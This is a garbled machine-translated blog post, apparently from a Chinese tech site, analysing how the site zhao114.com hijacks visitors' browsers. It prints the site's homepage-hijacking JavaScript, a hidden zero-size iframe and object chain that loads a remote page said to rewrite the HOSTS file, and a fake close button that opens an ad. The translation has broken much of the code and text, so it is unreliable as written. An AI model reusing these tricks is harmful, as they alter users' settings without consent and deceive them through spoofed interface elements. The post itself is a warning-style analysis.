Analysis of Malicious Site Zhao114 Code

xiaoxiao2021-03-06 19

I have long heard of some websites of malicious code. I didn't expect April Fool's Day to touch it. A friend said how Zhao114.com is hot, I am curious to look at my eyes, simple URL, but bring another web page, I didn't care much, and later found that this website actually modified the default home page, modify the HOSTS file, add a desktop, and use some page spoofing techniques. Under curious, he analyzed his source code. Listed as follows, please be careful:

IE prevents the way to pop up the pop-up window

The site uses numerous times

</ iframe></p> <p>The way the new window is popped, including advertising and virus code.</p> <p>2)</p> <p>Do not prompt setting up a JS file (setMyHome.js).</p> <p>The main code is the following setHome () function</p> <p><! -</p> <p>Function getCookie (Name) {</p> <p>VAR arg = name "=";</p> <p>VAR alen = arg.length;</p> <p>Var clen = document.cookie.ley;</p> <p>VAR i = 0;</p> <p>While (i <clen) {</p> <p>VAR J = I alen;</p> <p>IF (Document.cookie.substring (i, j) == arg)</p> <p>Return getCookieVal (j);</p> <p>I = Document.cookie.indexof ("", i) 1;</p> <p>IF (i == 0) BREAK;</p> <p>}</p> <p>Return NULL;</p> <p>}</p> <p>Function setCookie (Name, Value) {</p> <p>Var argv = setcookie.Arguments;</p> <p>Var argc = setCookie.Arguments.length;</p> <p>VAR Expires = (Argc> 2)? Argv [2]: NULL;</p> <p>VAR path = (argc> 3)? Argv [3]: NULL;</p> <p>Var Domain = (Argc> 4)? Argv [4]: NULL;</p> <p>VAR Secure = (Argc> 5)? Argv [5]: false;</p> <p>Document.cookie = Name "=" escape (value) </p> <p>(Expires == NULL)? "": ("; expires =" expires.togmtstring ())) </p> <p>((PATH == NULL)? "": ("; path =" path)) </p> <p>((DOMAIN == NULL)? "": ("; domain =" domain) </p> <p>(Secure == True)? "; Secure": "");</p> <p>}</p> <p>Function deletecookie (Name) {var exp = new date ();</p> <p>Exp.SetTime (Exp.getTime () - 1);</p> <p>// this cookie is history</p> <p>VAR CVAL = 0;</p> <p>Document.cookie = Name "=" CVAL "; Expires =" Exp.togmtstring ();</p> <p>}</p> <p>// Set the cookies time, and you will set it according to the situation.</p> <p>Var expdays = 1; // is set to 1 day</p> <p>VAR EXP = New Date ();</p> <p>Exp.SetTime (Exp.getTime () (Expdays * 24 * 60 * 60 * 1000));</p> <p>Function AMT () {</p> <p>Var count = getCookie ('count'); // The same IP is only displayed once</p> <p>// var count; // The same IP only shows N times</p> <p>// alert (count);</p> <p>// count = NULL;</p> <p>IF (count == null) {</p> <p>SetCookie ('count', '1')</p> <p>Return 1</p> <p>}</p> <p>Else {</p> <p>Var newcount = parseint (count) 1;</p> <p>IF (NewCount <2) count = 1;</p> <p>SetCookie ('Count', Newcount, Exp);</p> <p>// deletecookie ('count')</p> <p>Return newcount</p> <p>}</p> <p>}</p> <p>Function getCookieVal (Offset) {</p> <p>Var endstr = document.cookie.indexof (";", offset);</p> <p>IF (EndStr == -1)</p> <p>Endstr = Document.cookie.LENGTH;</p> <p>Return Unescape (Document.cookie.substring (Offset, EndStr));</p> <p>}</p> <p>Function setromE () {</p> <p>Document.Links [0] .style.behavior = 'URL (# default # homepage)';</p> <p>Document.links [0] .SethomePage ('http://www.zhao114.com');</p> <p>}</p> <p>IF (AMT () == 1)</p> <p>{</p> <p>setHome ()</p> <p>}</p> <p>// -></p> <p>3)</p> <p>Forcibly modify the hosts file</p> <p>(in yan88.htm)</p> <p><script src = "../ ADS / banner.js"> </ script></p> <p>(in banner.htm)</p> <p><Iframe border = 0 marginwidth = 0 marginheight = 0 src = "banner_files / wo.htm" frameborder = no width = 0 scrolling = noHEight = 0> </ iframe></p> <p>(in wo.htm)</p> <p><Object height = 0 width = 0 data = http://www.ni8.cn/set/setdns.chtm> </ Object></p> <p>(in setdns.chtm)</p> <p>This is the code</p> <p>4)</p> <p>A floating advertisement appears on the right side of the page spoofing page, telling others that there is a short message, point X position is not closed, but click the advertisement (middle).</p> <p>The code is as follows: <span title = Turns Style = "Font-Weight: bold; font-size: 12px; cursor: hand; color: red; margin-right: 4px</p> <p>οnclick = "javascript: closediv (); window.open ('http://www.zhao114.com/v.htm')"> × </ span></p> <p>In addition, the way he added a desktop I have no time to study, leave a friend who is interested, but the study is careful, it is best to give a backup of GHOST. In addition, there is one here.</p> <p>There are currently 38 list of oversized websites, everyone needs to be careful. Friends infected, can download one by 3721</p> <p>The Internet Assistant 2005 quickly solves the problem.</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-40557.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="40557" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.040</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'mYHBSbFmUdjMoiP3JhOZW14fEucGPhtTv27B8eyMXq_2BiXEB_2FRWmfqXL67eVwtlrfHmVlwQcEkbz8Ahgw1eG0RA_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>